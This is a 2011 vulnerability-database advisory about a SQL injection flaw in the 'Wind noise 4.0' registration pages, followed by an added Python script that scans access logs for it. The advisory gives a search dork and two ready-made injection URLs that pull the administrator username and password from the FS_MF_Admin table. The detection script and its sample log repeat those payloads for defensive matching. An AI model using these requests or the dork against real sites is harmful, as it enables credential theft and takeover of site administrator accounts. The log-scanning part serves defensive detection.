Wind noise 4.0 registration page exploit - vulnerability warning - the black bar safety net

2011-05-24T00:00:00
ID MYHACK58:62201130593
Type myhack58
Reporter Anonymous
Modified 2011-05-24T00:00:00

Description

Keywords: inurl:User/Reg_service.asp

The wind noise the registration page...

Vulnerable page: /user/SetNextOptions.asp

Usage:

Construct the injection request:

user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin

“admin_name” is the admin user name column of the FS_MF_Admin database table.

user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin

“admin_pass_word” is the admin password column of the FS_MF_Admin database table.
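
A defender's log check for the requests shown above, as an added example that is not part of the original advisory: it scans web server access logs for calls to /user/SetNextOptions.asp that carry a ReqSql parameter and escalates those that reference the admin table or its columns. The log lines are constructed, the field layout (IIS W3C style: date, time, method, URI stem, URI query, client IP, status) is an assumption, and the function names are illustrative.

```python
import re
from urllib.parse import parse_qs

VULN_PATH = "/user/setnextoptions.asp"  # page named in the advisory, lowercased
ADMIN_MARKERS = re.compile(r"fs_mf_admin|admin_name|admin_pass_word", re.I)

# Constructed log lines (assumed layout, see the #Fields header); "some_table" is made up.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2011-05-24 10:01:12 GET /user/Reg_service.asp - 192.0.2.10 200
2011-05-24 10:02:40 GET /user/SetNextOptions.asp sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin 198.51.100.7 200
2011-05-24 10:02:44 GET /User/setnextoptions.asp stype=1&reqsql=select%201,admin_pass_word,3,4,5,6,7,8%20from%20FS_MF_Admin 198.51.100.7 200
2011-05-24 10:03:05 GET /user/SetNextOptions.asp sType=1&EquValue=2&SelectName=city 192.0.2.10 200
2011-05-24 10:03:09 GET /user/SetNextOptions.asp sType=1&ReqSql=select+1,2,3,4,5,6,7,8+from+some_table 203.0.113.5 200
"""

def classify(stem, query):
    """Return None, 'client-sql' or 'admin-table-read' for one request."""
    if stem.lower() != VULN_PATH:        # IIS paths are case-insensitive
        return None
    params = {k.lower(): v for k, v in parse_qs(query, keep_blank_values=True).items()}
    if "reqsql" not in params:           # ASP query-string keys are case-insensitive
        return None
    sql = " ".join(params["reqsql"])     # parse_qs has already decoded '+' and %xx
    return "admin-table-read" if ADMIN_MARKERS.search(sql) else "client-sql"

def scan(log_text):
    """Return (timestamp, client_ip, verdict) for every flagged log line."""
    findings = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) < 7:
            continue
        date, time, _method, stem, query, ip, _status = parts[:7]
        verdict = classify(stem, "" if query == "-" else query)
        if verdict:
            findings.append((f"{date} {time}", ip, verdict))
    return findings

if __name__ == "__main__":
    for ts, ip, verdict in scan(SAMPLE_LOG):
        print(ts, ip, verdict)
```

Any hit means SQL text arrived from the client in the query string; an 'admin-table-read' hit with a 200 status is a reason to rotate the administrator credentials.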